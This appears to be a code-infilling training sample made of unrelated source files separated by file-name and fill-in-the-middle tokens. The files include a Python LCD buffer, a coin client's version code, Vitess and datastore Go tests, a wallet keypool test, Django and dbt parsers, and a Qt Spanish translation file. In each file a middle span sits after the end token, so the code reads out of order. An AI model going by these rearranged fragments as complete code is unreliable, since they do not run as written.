def onLoad(self, lcd):
pass
class ScreenBuffer:
def __init__(self, rows, cols):
self._rows = rows
self._cols = cols
self._array = array.array('c', [' '] * (rows * cols))
def __eq__(self, other):
if isinstance(other, ScreenMatrix):
return self._array == other._array
return False
def array(self):
return self._array
def _AllocNewArray(self):
return array.array('c', [' '] * (self._rows * self._cols))
def _GetOffset(self, row, col):
return row*self._cols + col
def Clear(self):
self._array = self._AllocNewArray()
def Write(self, data, row, col, span):
""" replace data at row, col in this matrix """
assert row in range(self._rows)
assert col in range(self._cols)
start = self._GetOffset(row, col)
datalen = min(len(data), span)
end = start + datalen
self._array[start:end] = data[:datalen]
def __str__(self):
return self._array.tostring()<|fim▁end|> | self._widgets = {}
self._position = {}
self._span = {} |
<|file_name|>clientversion.cpp<|end_file_name|><|fim▁begin|>// Copyright (c) 2012-2014 The Moneta developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "clientversion.h"
#include "tinyformat.h"
#include <string>
/**
* Name of client reported in the 'version' message. Report the same name
* for both monetad and moneta-core, to make it harder for attackers to
* target servers or GUI users specifically.
*/
const std::string CLIENT_NAME("Tellurion");
/**
* Client version number
*/
#define CLIENT_VERSION_SUFFIX ""
/**
* The following part of the code determines the CLIENT_BUILD variable.
* Several mechanisms are used for this:
* * first, if HAVE_BUILD_INFO is defined, include build.h, a file that is
* generated by the build environment, possibly containing the output
* of git-describe in a macro called BUILD_DESC
* * secondly, if this is an exported version of the code, GIT_ARCHIVE will
* be defined (automatically using the export-subst git attribute), and
* GIT_COMMIT will contain the commit id.
* * then, three options exist for determining CLIENT_BUILD:
* * if BUILD_DESC is defined, use that literally (output of git-describe)
* * if not, but GIT_COMMIT is defined, use v[maj].[min].[rev].[build]-g[commit]
* * otherwise, use v[maj].[min].[rev].[build]-unk
* finally CLIENT_VERSION_SUFFIX is added
*/
//! First, include build.h if requested
#ifdef HAVE_BUILD_INFO
#include "build.h"
#endif
//! git will put "#define GIT_ARCHIVE 1" on the next line inside archives. $Format:%n#define GIT_ARCHIVE 1$
#ifdef GIT_ARCHIVE
#define GIT_COMMIT_ID "$Format:%h$"
#define GIT_COMMIT_DATE "$Format:%cD$"
#endif
#define BUILD_DESC_WITH_SUFFIX(maj, min, rev, build, suffix) \
"v" DO_STRINGIZE(maj) "." DO_STRINGIZE(min) "." DO_STRINGIZE(rev) "." DO_STRINGIZE(build) "-" DO_STRINGIZE(suffix)
#define BUILD_DESC_FROM_COMMIT(maj, min, rev, build, commit) \
"v" DO_STRINGIZE(maj) "." DO_STRINGIZE(min) "." DO_STRINGIZE(rev) "." DO_STRINGIZE(build) "-g" commit
#define BUILD_DESC_FROM_UNKNOWN(maj, min, rev, build) \
"v" DO_STRINGIZE(maj) "." DO_STRINGIZE(min) "." DO_STRINGIZE(rev) "." DO_STRINGIZE(build) "-unk"
#ifndef BUILD_DESC
#ifdef BUILD_SUFFIX
#define BUILD_DESC BUILD_DESC_WITH_SUFFIX(CLIENT_VERSION_MAJOR, CLIENT_VERSION_MINOR, CLIENT_VERSION_REVISION, CLIENT_VERSION_BUILD, BUILD_SUFFIX)
#elif defined(GIT_COMMIT_ID)
#define BUILD_DESC BUILD_DESC_FROM_COMMIT(CLIENT_VERSION_MAJOR, CLIENT_VERSION_MINOR, CLIENT_VERSION_REVISION, CLIENT_VERSION_BUILD, GIT_COMMIT_ID)<|fim▁hole|>
#ifndef BUILD_DATE
#ifdef GIT_COMMIT_DATE
#define BUILD_DATE GIT_COMMIT_DATE
#else
#define BUILD_DATE __DATE__ ", " __TIME__
#endif
#endif
const std::string CLIENT_BUILD(BUILD_DESC CLIENT_VERSION_SUFFIX);
const std::string CLIENT_DATE(BUILD_DATE);
static std::string FormatVersion(int nVersion)
{
if (nVersion % 100 == 0)
return strprintf("%d.%d.%d", nVersion / 1000000, (nVersion / 10000) % 100, (nVersion / 100) % 100);
else
return strprintf("%d.%d.%d.%d", nVersion / 1000000, (nVersion / 10000) % 100, (nVersion / 100) % 100, nVersion % 100);
}
std::string FormatFullVersion()
{
return CLIENT_BUILD;
}
/**
* Format the subversion field according to BIP 14 spec (https://github.com/moneta/bips/blob/master/bip-0014.mediawiki)
*/
std::string FormatSubVersion(const std::string& name, int nClientVersion, const std::vector<std::string>& comments)
{
std::ostringstream ss;
ss << "/";
ss << name << ":" << FormatVersion(nClientVersion);
if (!comments.empty())
{
std::vector<std::string>::const_iterator it(comments.begin());
ss << "(" << *it;
for(++it; it != comments.end(); ++it)
ss << "; " << *it;
ss << ")";
}
ss << "/";
return ss.str();
}<|fim▁end|> | #else
#define BUILD_DESC BUILD_DESC_FROM_UNKNOWN(CLIENT_VERSION_MAJOR, CLIENT_VERSION_MINOR, CLIENT_VERSION_REVISION, CLIENT_VERSION_BUILD)
#endif
#endif |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>##########################################################################
#
# Copyright (c) 2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following<|fim▁hole|># the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
__import__( "Gaffer" )
from _GafferDispatch import *
from LocalDispatcher import LocalDispatcher
from SystemCommand import SystemCommand
from TaskList import TaskList
from TaskContextProcessor import TaskContextProcessor
from Wedge import Wedge
from TaskContextVariables import TaskContextVariables
from TaskSwitch import TaskSwitch
from PythonCommand import PythonCommand
__import__( "IECore" ).loadConfig( "GAFFER_STARTUP_PATHS", {}, subdirectory = "GafferDispatch" )<|fim▁end|> | # disclaimer in the documentation and/or other materials provided with |
<|file_name|>apply_schema_test.go<|end_file_name|><|fim▁begin|>/*
Copyright 2017 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package testlib
import (
"strings"
"testing"
"golang.org/x/net/context"<|fim▁hole|> "vitess.io/vitess/go/mysql/fakesqldb"
"vitess.io/vitess/go/sqltypes"
"vitess.io/vitess/go/vt/logutil"
"vitess.io/vitess/go/vt/mysqlctl/tmutils"
"vitess.io/vitess/go/vt/topo/memorytopo"
"vitess.io/vitess/go/vt/vttablet/tmclient"
"vitess.io/vitess/go/vt/wrangler"
tabletmanagerdatapb "vitess.io/vitess/go/vt/proto/tabletmanagerdata"
topodatapb "vitess.io/vitess/go/vt/proto/topodata"
)
// TestApplySchema_AllowLongUnavailability is an integration test for the
// -allow_long_unavailability flag of vtctl ApplySchema.
// Only if the flag is specified, potentially long running schema changes are
// allowed.
func TestApplySchema_AllowLongUnavailability(t *testing.T) {
cell := "cell1"
db := fakesqldb.New(t)
defer db.Close()
ts := memorytopo.NewServer(cell)
wr := wrangler.New(logutil.NewConsoleLogger(), ts, tmclient.NewTabletManagerClient())
vp := NewVtctlPipe(t, ts)
defer vp.Close()
if err := ts.CreateKeyspace(context.Background(), "ks", &topodatapb.Keyspace{
ShardingColumnName: "keyspace_id",
ShardingColumnType: topodatapb.KeyspaceIdType_UINT64,
}); err != nil {
t.Fatalf("CreateKeyspace failed: %v", err)
}
beforeSchema := &tabletmanagerdatapb.SchemaDefinition{
DatabaseSchema: "CREATE DATABASE `{{.DatabaseName}}` /*!40100 DEFAULT CHARACTER SET utf8 */",
TableDefinitions: []*tabletmanagerdatapb.TableDefinition{
{
Name: "table1",
Schema: "CREATE TABLE `table1` (\n `id` bigint(20) NOT NULL AUTO_INCREMENT,\n `msg` varchar(64) DEFAULT NULL,\n `keyspace_id` bigint(20) unsigned NOT NULL,\n PRIMARY KEY (`id`),\n KEY `by_msg` (`msg`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8",
Type: tmutils.TableBaseTable,
RowCount: 3000000,
},
},
}
afterSchema := &tabletmanagerdatapb.SchemaDefinition{
DatabaseSchema: "CREATE DATABASE `{{.DatabaseName}}` /*!40100 DEFAULT CHARACTER SET utf8 */",
TableDefinitions: []*tabletmanagerdatapb.TableDefinition{
{
Name: "table1",
Schema: "CREATE TABLE `table1` (\n `id` bigint(20) NOT NULL AUTO_INCREMENT,\n `msg` varchar(64) DEFAULT NULL,\n `keyspace_id` bigint(20) unsigned NOT NULL,\n `id` bigint(20),\n PRIMARY KEY (`id`),\n KEY `by_msg` (`msg`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8",
Type: tmutils.TableBaseTable,
RowCount: 3000000,
},
},
}
preflightSchemaChanges := []*tabletmanagerdatapb.SchemaChangeResult{
{
BeforeSchema: beforeSchema,
AfterSchema: afterSchema,
},
}
tShard1 := NewFakeTablet(t, wr, cell, 0,
topodatapb.TabletType_MASTER, db, TabletKeyspaceShard(t, "ks", "-80"))
tShard2 := NewFakeTablet(t, wr, cell, 1,
topodatapb.TabletType_MASTER, db, TabletKeyspaceShard(t, "ks", "80-"))
for _, ft := range []*FakeTablet{tShard1, tShard2} {
ft.StartActionLoop(t, wr)
defer ft.StopActionLoop(t)
ft.FakeMysqlDaemon.Schema = beforeSchema
ft.FakeMysqlDaemon.PreflightSchemaChangeResult = preflightSchemaChanges
}
changeToDb := "USE vt_ks"
addColumn := "ALTER TABLE table1 ADD COLUMN new_id bigint(20)"
db.AddQuery(changeToDb, &sqltypes.Result{})
db.AddQuery(addColumn, &sqltypes.Result{})
// First ApplySchema fails because the table is very big and -allow_long_unavailability is missing.
if err := vp.Run([]string{"ApplySchema", "-sql", addColumn, "ks"}); err == nil {
t.Fatal("ApplySchema should have failed but did not.")
} else if !strings.Contains(err.Error(), "big schema change detected") {
t.Fatalf("ApplySchema failed with wrong error. got: %v", err)
}
// Second ApplySchema succeeds because -allow_long_unavailability is set.
if err := vp.Run([]string{"ApplySchema", "-allow_long_unavailability", "-sql", addColumn, "ks"}); err != nil {
t.Fatalf("ApplySchema failed: %v", err)
}
if count := db.GetQueryCalledNum(changeToDb); count != 2 {
t.Fatalf("ApplySchema: unexpected call count. Query: %v got: %v want: %v", changeToDb, count, 2)
}
if count := db.GetQueryCalledNum(addColumn); count != 2 {
t.Fatalf("ApplySchema: unexpected call count. Query: %v got: %v want: %v", addColumn, count, 2)
}
}<|fim▁end|> | |
<|file_name|>Print_Success_SRV.py<|end_file_name|><|fim▁begin|># This file is part of Invenio.
# Copyright (C) 2004, 2005, 2006, 2007, 2008, 2010, 2011, 2017 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
from invenio.config import CFG_SITE_URL, CFG_SITE_RECORD
from invenio.websubmit_functions.Shared_Functions import ParamFromFile
## Description: function Print_Success_SRV<|fim▁hole|>
def Print_Success_SRV(parameters, curdir, form, user_info=None):
"""
This function simply displays a text on the screen, telling the
user the revision went fine. To be used in the Submit New File
(SRV) action.
"""
global rn
sysno = ParamFromFile("%s/%s" % (curdir, 'SN')).strip()
t = "<b>Modification completed!</b><br /><br />"
if sysno:
# If we know the URL of the document, we display it for user's convenience (RQF0800417)
url = '%s/%s/%s' % (CFG_SITE_URL, CFG_SITE_RECORD, sysno)
t = "<br /><br /><b>Document %s (<b><a href='%s'>%s</a></b>) was successfully revised.</b>" % (rn, url, url)
else:
t = "<br /><br /><b>Document %s was successfully revised.</b>" % rn
return t<|fim▁end|> | ## This function displays a message telling the user the
## revised files have been correctly received
## Author: T.Baron
## PARAMETERS: - |
<|file_name|>fields.py<|end_file_name|><|fim▁begin|>from django.db import models
# Django doesn't support big auto fields out of the box, see
# https://code.djangoproject.com/ticket/14286.
# This is a stripped down version of the BoundedBigAutoField from Sentry.
class BigAutoField(models.AutoField):
description = "Big Integer"
def db_type(self, connection):
engine = connection.settings_dict['ENGINE']
if 'mysql' in engine:
return "bigint AUTO_INCREMENT"<|fim▁hole|> elif 'postgres' in engine:
return "bigserial"
else:
raise NotImplemented
def get_related_db_type(self, connection):
return models.BigIntegerField().db_type(connection)
def get_internal_type(self):
return "BigIntegerField"
class FlexibleForeignKey(models.ForeignKey):
def db_type(self, connection):
# This is required to support BigAutoField
rel_field = self.related_field
if hasattr(rel_field, 'get_related_db_type'):
return rel_field.get_related_db_type(connection)
return super(FlexibleForeignKey, self).db_type(connection)<|fim▁end|> | |
<|file_name|>dmx_color_variable_controller_test.go<|end_file_name|><|fim▁begin|>package datastore
import (
"testing"
"github.com/StageAutoControl/controller/pkg/api"
"github.com/StageAutoControl/controller/pkg/cntl"
internalTesting "github.com/StageAutoControl/controller/pkg/internal/testing"
"github.com/jinzhu/copier"
)
func TestDMXColorVariableController_Create_WithID(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
entity := ds.DMXColorVariables[key]
createReply := &cntl.DMXColorVariable{}
if err := controller.Create(req, entity, createReply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if createReply.ID != key {
t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
}
}
func TestDMXColorVariableController_Create_WithoutID(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
entity := ds.DMXColorVariables[key]
createEntity := &cntl.DMXColorVariable{}
if err := copier.Copy(createEntity, entity); err != nil {
t.Fatal(err)
}
createEntity.ID = ""
createReply := &cntl.DMXColorVariable{}
if err := controller.Create(req, entity, createReply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if createReply.ID != key {
t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
}
}
func TestDMXColorVariableController_Get_NotExisting(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
reply := &cntl.DMXColorVariable{}
idReq := &api.IDBody{ID: key}
if err := controller.Get(req, idReq, reply); err != api.ErrNotExists {
t.Errorf("expected to get api.ErrNotExists, but got %v", err)
}
}
func TestDMXColorVariableController_Get_Existing(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
entity := ds.DMXColorVariables[key]
createReply := &cntl.DMXColorVariable{}
if err := controller.Create(req, entity, createReply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if createReply.ID != key {
t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
}
reply := &cntl.DMXColorVariable{}
idReq := &api.IDBody{ID: key}
t.Log("idReq has ID:", idReq.ID)
if err := controller.Get(req, idReq, reply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if reply.ID != key {
t.Errorf("Expected reply to have id %s, but has %s", key, reply.ID)<|fim▁hole|> }
}
func TestDMXColorVariableController_Update_NotExisting(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
entity := ds.DMXColorVariables[key]
reply := &cntl.DMXColorVariable{}
if err := controller.Update(req, entity, reply); err != api.ErrNotExists {
t.Errorf("expected to get api.ErrNotExists, but got %v", err)
}
}
func TestDMXColorVariableController_Update_Existing(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
entity := ds.DMXColorVariables[key]
createReply := &cntl.DMXColorVariable{}
if err := controller.Create(req, entity, createReply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if createReply.ID != key {
t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
}
reply := &cntl.DMXColorVariable{}
if err := controller.Update(req, entity, reply); err != nil {
t.Errorf("expected to get no error, but got %v", err)
}
if reply.ID != key {
t.Errorf("Expected reply to have id %s, but has %s", key, reply.ID)
}
}
func TestDMXColorVariableController_Delete_NotExisting(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
reply := &api.SuccessResponse{}
idReq := &api.IDBody{ID: key}
if err := controller.Delete(req, idReq, reply); err != api.ErrNotExists {
t.Errorf("expected to get api.ErrNotExists, but got %v", err)
}
}
func TestDMXColorVariableController_Delete_Existing(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
entity := ds.DMXColorVariables[key]
createReply := &cntl.DMXColorVariable{}
if err := controller.Create(req, entity, createReply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if createReply.ID != key {
t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
}
reply := &api.SuccessResponse{}
idReq := &api.IDBody{ID: key}
if err := controller.Delete(req, idReq, reply); err != nil {
t.Errorf("expected to get no error, but got %v", err)
}
if !reply.Success {
t.Error("Expected to get result true, but got false")
}
}<|fim▁end|> | |
<|file_name|>keypool.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2
# Copyright (c) 2014 The Bitcoin Core developers
# Copyright (c) 2017-2018 The LitecoinZ developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Exercise the wallet keypool, and interaction with wallet encryption/locking
# Add python-bitcoinrpc to module search path:
from test_framework.authproxy import JSONRPCException
from test_framework.util import check_json_precision, initialize_chain, \
start_nodes, start_node, stop_nodes, wait_litecoinzds, litecoinzd_processes
import os
import sys
import shutil
import tempfile
import traceback
def check_array_result(object_array, to_match, expected):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
"""
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0:
raise AssertionError("No objects matched %s"%(str(to_match)))
def run_test(nodes, tmpdir):
# Encrypt wallet and wait to terminate
nodes[0].encryptwallet('test')
litecoinzd_processes[0].wait()
# Restart node 0
nodes[0] = start_node(0, tmpdir)
# Keep creating keys
addr = nodes[0].getnewaddress()
try:
addr = nodes[0].getnewaddress()
raise AssertionError('Keypool should be exhausted after one address')
except JSONRPCException,e:
assert(e.error['code']==-12)
# put three new keys in the keypool
nodes[0].walletpassphrase('test', 12000)
nodes[0].keypoolrefill(3)
nodes[0].walletlock()
# drain the keys<|fim▁hole|> addr.add(nodes[0].getrawchangeaddress())
addr.add(nodes[0].getrawchangeaddress())
addr.add(nodes[0].getrawchangeaddress())
# assert that four unique addresses were returned
assert(len(addr) == 4)
# the next one should fail
try:
addr = nodes[0].getrawchangeaddress()
raise AssertionError('Keypool should be exhausted after three addresses')
except JSONRPCException,e:
assert(e.error['code']==-12)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave litecoinzds and test.* datadir on exit or error")
parser.add_option("--srcdir", dest="srcdir", default="../../src",
help="Source directory containing litecoinzd/litecoinz-cli (default: %default%)")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
(options, args) = parser.parse_args()
os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
check_json_precision()
success = False
nodes = []
try:
print("Initializing test directory "+options.tmpdir)
if not os.path.isdir(options.tmpdir):
os.makedirs(options.tmpdir)
initialize_chain(options.tmpdir)
nodes = start_nodes(1, options.tmpdir, extra_args=[['-experimentalfeatures', '-developerencryptwallet']])
run_test(nodes, options.tmpdir)
success = True
except AssertionError as e:
print("Assertion failed: "+e.message)
except JSONRPCException as e:
print("JSONRPC error: "+e.error['message'])
traceback.print_tb(sys.exc_info()[2])
except Exception as e:
print("Unexpected exception caught during testing: "+str(sys.exc_info()[0]))
traceback.print_tb(sys.exc_info()[2])
if not options.nocleanup:
print("Cleaning up")
stop_nodes(nodes)
wait_litecoinzds()
shutil.rmtree(options.tmpdir)
if success:
print("Tests successful")
sys.exit(0)
else:
print("Failed")
sys.exit(1)
# refill keypool with three new addresses
nodes[0].walletpassphrase('test', 12000)
nodes[0].keypoolrefill(3)
nodes[0].walletlock()
# drain them by mining
nodes[0].generate(1)
nodes[0].generate(1)
nodes[0].generate(1)
nodes[0].generate(1)
try:
nodes[0].generate(1)
raise AssertionError('Keypool should be exhausted after three addresses')
except JSONRPCException,e:
assert(e.error['code']==-12)
if __name__ == '__main__':
main()<|fim▁end|> | addr = set()
addr.add(nodes[0].getrawchangeaddress()) |
<|file_name|>sql.py<|end_file_name|><|fim▁begin|>import os
from dataclasses import dataclass
from typing import Iterable
from dbt.contracts.graph.manifest import SourceFile
from dbt.contracts.graph.parsed import ParsedSqlNode, ParsedMacro
from dbt.contracts.graph.unparsed import UnparsedMacro
from dbt.exceptions import InternalException
from dbt.node_types import NodeType
from dbt.parser.base import SimpleSQLParser
from dbt.parser.macros import MacroParser
from dbt.parser.search import FileBlock
@dataclass
class SqlBlock(FileBlock):
block_name: str
<|fim▁hole|> @property
def name(self):
return self.block_name
class SqlBlockParser(SimpleSQLParser[ParsedSqlNode]):
def parse_from_dict(self, dct, validate=True) -> ParsedSqlNode:
if validate:
ParsedSqlNode.validate(dct)
return ParsedSqlNode.from_dict(dct)
@property
def resource_type(self) -> NodeType:
return NodeType.SqlOperation
@staticmethod
def get_compiled_path(block: FileBlock):
# we do it this way to make mypy happy
if not isinstance(block, SqlBlock):
raise InternalException(
'While parsing SQL operation, got an actual file block instead of '
'an SQL block: {}'.format(block)
)
return os.path.join('sql', block.name)
def parse_remote(self, sql: str, name: str) -> ParsedSqlNode:
source_file = SourceFile.remote(sql, self.project.project_name)
contents = SqlBlock(block_name=name, file=source_file)
return self.parse_node(contents)
class SqlMacroParser(MacroParser):
def parse_remote(self, contents) -> Iterable[ParsedMacro]:
base = UnparsedMacro(
path='from remote system',
original_file_path='from remote system',
package_name=self.project.project_name,
raw_sql=contents,
root_path=self.project.project_root,
resource_type=NodeType.Macro,
)
for node in self.parse_unparsed_macros(base):
yield node<|fim▁end|> | |
<|file_name|>kcoin_es_CL.ts<|end_file_name|><|fim▁begin|><TS language="es_CL" version="2.1">
<context>
<name>AddressBookPage</name>
<message>
<source>Right-click to edit address or label</source>
<translation>Haga clic para editar la dirección o etiqueta</translation>
</message>
<message>
<source>Create a new address</source>
<translation>Crea una nueva direCrea una nueva direccióncción</translation>
</message>
<message>
<source>&New</source>
<translation>y nueva</translation>
</message>
<message>
<source>Copy the currently selected address to the system clipboard</source>
<translation>Copia la dirección seleccionada al portapapeles</translation>
</message>
<message>
<source>&Copy</source>
<translation>y copiar</translation>
</message>
<message>
<source>C&lose</source>
<translation>C y perder</translation>
</message>
<message>
<source>&Copy Address</source>
<translation>&Copia dirección</translation>
</message>
<message>
<source>Delete the currently selected address from the list</source>
<translation>Eliminar la dirección seleccionada de la lista</translation>
</message>
<message>
<source>Export the data in the current tab to a file</source>
<translation>Exportar los datos de la pestaña actual a un archivo</translation>
</message>
<message>
<source>&Export</source>
<translation>y exportar</translation>
</message>
<message>
<source>&Delete</source>
<translation>&Borrar</translation>
</message>
<message>
<source>Copy &Label</source>
<translation>Copia &etiqueta</translation>
</message>
<message>
<source>&Edit</source>
<translation>&Editar</translation>
</message>
<message>
<source>Comma separated file (*.csv)</source>
<translation>Archivos separados por coma (*.csv)</translation>
</message>
</context>
<context>
<name>AddressTableModel</name>
<message>
<source>Label</source>
<translation>Etiqueta</translation>
</message>
<message>
<source>Address</source>
<translation>Dirección</translation>
</message>
<message>
<source>(no label)</source>
<translation>(sin etiqueta)</translation>
</message>
</context>
<context>
<name>AskPassphraseDialog</name>
<message>
<source>Enter passphrase</source>
<translation>Introduce contraseña actual </translation>
</message>
<message>
<source>New passphrase</source>
<translation>Nueva contraseña</translation>
</message>
<message>
<source>Repeat new passphrase</source>
<translation>Repite nueva contraseña</translation>
</message>
<message>
<source>Encrypt wallet</source>
<translation>Codificar billetera</translation>
</message>
<message>
<source>This operation needs your wallet passphrase to unlock the wallet.</source>
<translation>Esta operación necesita la contraseña para desbloquear la billetera.</translation>
</message>
<message>
<source>Unlock wallet</source>
<translation>Desbloquea billetera</translation>
</message>
<message>
<source>This operation needs your wallet passphrase to decrypt the wallet.</source>
<translation>Esta operación necesita la contraseña para decodificar la billetara.</translation>
</message>
<message>
<source>Decrypt wallet</source>
<translation>Decodificar cartera</translation>
</message>
<message>
<source>Change passphrase</source>
<translation>Cambia contraseña</translation>
</message>
<message>
<source>Confirm wallet encryption</source>
<translation>Confirma la codificación de cartera</translation>
</message>
<message>
<source>Warning: If you encrypt your wallet and lose your passphrase, you will <b>LOSE ALL OF YOUR KCOINS</b>!</source>
<translation>Atención: ¡Si codificas tu billetera y pierdes la contraseña perderás <b>TODOS TUS KCOINS</b>!</translation>
</message>
<message>
<source>Are you sure you wish to encrypt your wallet?</source>
<translation>¿Seguro que quieres seguir codificando la billetera?</translation>
</message>
<message>
<source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source>
<translation>IMPORTANTE: Cualquier versión anterior que hayas realizado de tu archivo de billetera será reemplazada por el nuevo archivo de billetera encriptado. Por razones de seguridad, los respaldos anteriores de los archivos de billetera se volverán inútiles en tanto comiences a usar la nueva billetera encriptada.</translation>
</message>
<message>
<source>Warning: The Caps Lock key is on!</source>
<translation>Precaucion: Mayúsculas Activadas</translation>
</message>
<message>
<source>Wallet encrypted</source>
<translation>Billetera codificada</translation>
</message>
<message>
<source>Wallet encryption failed</source>
<translation>Falló la codificación de la billetera</translation>
</message>
<message>
<source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source>
<translation>La codificación de la billetera falló debido a un error interno. Tu billetera no ha sido codificada.</translation>
</message>
<message>
<source>The supplied passphrases do not match.</source>
<translation>Las contraseñas no coinciden.</translation>
</message>
<message>
<source>Wallet unlock failed</source>
<translation>Ha fallado el desbloqueo de la billetera</translation>
</message>
<message>
<source>The passphrase entered for the wallet decryption was incorrect.</source>
<translation>La contraseña introducida para decodificar la billetera es incorrecta.</translation>
</message>
<message>
<source>Wallet decryption failed</source>
<translation>Ha fallado la decodificación de la billetera</translation>
</message>
<message>
<source>Wallet passphrase was successfully changed.</source>
<translation>La contraseña de billetera ha sido cambiada con éxito.</translation>
</message>
</context>
<context>
<name>KcoinGUI</name>
<message>
<source>Sign &message...</source>
<translation>Firmar &Mensaje...</translation>
</message>
<message>
<source>Synchronizing with network...</source>
<translation>Sincronizando con la red...</translation>
</message>
<message>
<source>&Overview</source>
<translation>&Vista general</translation>
</message>
<message>
<source>Show general overview of wallet</source>
<translation>Muestra una vista general de la billetera</translation>
</message>
<message>
<source>&Transactions</source>
<translation>&Transacciones</translation>
</message>
<message>
<source>Browse transaction history</source>
<translation>Explora el historial de transacciónes</translation>
</message>
<message>
<source>E&xit</source>
<translation>&Salir</translation>
</message>
<message>
<source>Quit application</source>
<translation>Salir del programa</translation>
</message>
<message>
<source>About &Qt</source>
<translation>Acerca de</translation>
</message>
<message>
<source>Show information about Qt</source>
<translation>Mostrar Información sobre QT</translation>
</message>
<message>
<source>&Options...</source>
<translation>&Opciones</translation>
</message>
<message>
<source>&Encrypt Wallet...</source>
<translation>&Codificar la billetera...</translation>
</message>
<message>
<source>&Backup Wallet...</source>
<translation>&Respaldar billetera...</translation>
</message>
<message>
<source>&Change Passphrase...</source>
<translation>&Cambiar la contraseña...</translation>
</message>
<message>
<source>Open &URI...</source>
<translation>Abrir y url...</translation>
</message>
<message>
<source>Kcoin Core client</source>
<translation>cliente kcoin core</translation>
</message>
<message>
